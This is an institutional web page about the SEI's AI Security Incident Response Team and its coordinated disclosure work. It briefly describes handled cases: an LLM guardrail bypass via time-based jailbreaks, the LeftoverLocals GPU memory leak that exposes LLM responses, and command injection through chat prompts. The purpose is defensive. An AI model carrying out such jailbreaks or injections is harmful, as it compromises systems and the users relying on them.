icon-carat-right menu search cmu-wordmark

AISIRT Advances National Security with Secure AI

Created November 2023 • Updated March 2025

In November 2023, the Software Engineering Institute (SEI) developed the first Artificial Intelligence Security Incident Response Team (AISIRT) to increase the safety and security of the artificial intelligence (AI) systems used by the Department of Defense (DoD) and other federal agencies. The AISIRT advances the strategic advantage of AI by providing the DoD and other federal agencies with the capability to identify, analyze, and respond to the threats, vulnerabilities, and incidents that emerge from the ongoing advances in AI and machine learning (ML). In operating the AISIRT, the SEI leverages both its expertise in cybersecurity and AI as well as its decades-long track record of coordinating vulnerability disclosure (CVD) and developing cyber response capabilities and teams across the globe.

AI Creates New Capabilities, but Also New Risks

As the DoD integrates the use of AI throughout its work and seeks to advance the strategic advantage AI provides, it is faced with the fact that secure and effective adoption and use of AI capabilities is not guaranteed.

Improper development, implementation, or use of AI can result in disastrous consequences that can threaten the economic health, societal well-being, and security of the nation. In fact, several large-scale AI and ML vulnerabilities have already had far-reaching impacts and implications, and these events are likely to proliferate as AI rapidly evolves and more federal agencies embrace its potential to advance their work.

To provide the DoD—and the nation—with a capability for addressing the risks introduced by the rapid growth and widespread use of AI, the SEI formed a first-of-its-kind AISIRT.

AISIRT Advances National Security with Secure AI

AISIRT: A Collaboration Between the SEI, Carnegie Mellon University, and Others

The AISIRT is part of Carnegie Mellon University's (CMU’s) coordinated effort to advance AI, and it involves collaborations between the researchers at the SEI and CMU. CMU is the leading academic and research institution in the disciplines of computer science and engineering, AI, and cybersecurity. AISIRT also collaborates with divisions across the SEI and leverages the SEI’s extensive coordination network of approximately 5,400 industry partners, including 4,400 vendors and 1,000 security researchers, as well as various government organizations.

AISIRT Provides Protection as AI Evolves

The goal of the SEI’s AISIRT is to lead a community-focused research and development effort to ensure the secure and effective development and use of AI technologies for the DoD—and beyond—as these technologies continue to evolve and grow. The AISIRT continuously monitors threats and security incidents that arise from AI and ML systems, and it performs incident analysis, response, and vulnerability mitigation to develop mechanisms that keep AI and ML systems safe and secure. It focuses on many kinds of AI systems, including those that affect commerce, but most importantly on systems that concern critical infrastructure, defense, and national security.

Since its founding in 2023, AISIRT developed guidance on how to use CVD to manage AI vulnerabilities. Once a vulnerability has been discovered, reproduced, and reported, the process of CVD includes validating the vulnerability, coordinating a response with all relevant stakeholders, making the public aware of the vulnerability (if appropriate), and deploying a solution or workaround. Through this process, the AISIRT supported the response to 103 community-reported AI vulnerabilities since its founding. Significant vulnerabilities that the AISIRT has helped address include the following:

  • jailbreak vulnerability: After a user reported a large language model (LLM) guardrail bypass vulnerability, AISIRT engaged the LLM developers to address the issue. Working with the LLM developers, AISIRT ensured mitigation measures were put in place, particularly to prevent future, time-based jailbreak attacks.
  • GPU API vulnerability: AI systems rely on specialized hardware with specific application program interfaces (API) and software development kits (SDK), which introduces unique risks. For instance, the LeftoverLocals vulnerability allowed attackers to use a GPU-specific API to exploit memory leaks to extract LLM responses, potentially exposing sensitive information. AISIRT worked with stakeholders, leading to an update in the Khronos standard to mitigate future risks in GPU memory management.
  • command injection vulnerability: These vulnerabilities, a subset of Prompt Injection, primarily target AI environments that accept user inputs in the form of chatbots or AI agents. A malicious user can take advantage of the chat prompt to inject malicious code or other unwanted commands, which can compromise the AI environment or even the entire system. One such vulnerability was reported to AISIRT by security researchers. AISIRT collaborated with the vendor to implement security measures through policy updates and the use of appropriate sandbox environments to protect against such threats.

To deliver solutions to these and other vulnerabilities, the AISIRT draws on the team’s deep technical expertise while leveraging the SEI’s vast partnership network that includes software vendors like Google and Microsoft, as well as many AI and ML vendors, and organizations of all kinds, including military, government, industry, and academia.

AISIRT Advances National Security with Secure AI

Looking Ahead

The AISIRT fills an immediate and ongoing need to ensure that AI is safe, secure, contributes to the growth of our nation, and continues to evolve in an ethical and responsible way. Going forward, the AISIRT will continue to address AI vulnerabilities and facilitate solutions while also advancing the state of AI security in emerging areas such as AI digital forensics and incident response, AI assurance, and AI red-teaming.

“We are working to extend cybersecurity best practices, such as coordinated vulnerability disclosure, to AI,” said Lauren McIlvenny, who leads AISIRT as the technical director of threat analysis in the SEI’s CERT Division. “We are also performing cutting-edge research to stay ahead of the expanding set of critical issues and attack vectors born of the rapid adoption of AI-enabled systems in consumer, commercial, and national security applications.”

Learn More

AI Hygiene Starts with Models and Data Loaders

White Paper

This paper places a call to action for traditional cybersecurity tools and techniques to be applied to artificial intelligence (AI) for improving the cybersecurity of AI systems.

Read

Protecting AI from the Outside In: The Case for Coordinated Vulnerability Disclosure

Blog Post

This post highlights lessons learned from applying the coordinated vulnerability disclosure (CVD) process to reported vulnerabilities in AI and ML systems.

READ

Best Practices and Lessons Learned in Standing Up an AISIRT

Podcast

In the wake of widespread adoption of AI practices in critical infrastructure, best practices and lessons learned in standing up a AI Security Incident Response Team (AISIRT).

Listen

The Challenge of Adversarial Machine Learning

Blog Post

This SEI Blog post examines how machine learning systems can be subverted through adversarial machine learning, the motivations of adversaries, and what researchers are doing to mitigate their attacks.

READ

Adversarial ML Threat Matrix: Adversarial Tactics, Techniques, and Common Knowledge of Machine Learning

Blog Post

This SEI Blog post introduces the Adversarial ML Threat Matrix, a list of tactics to exploit machine learning models, and guidance on defense against them.

READ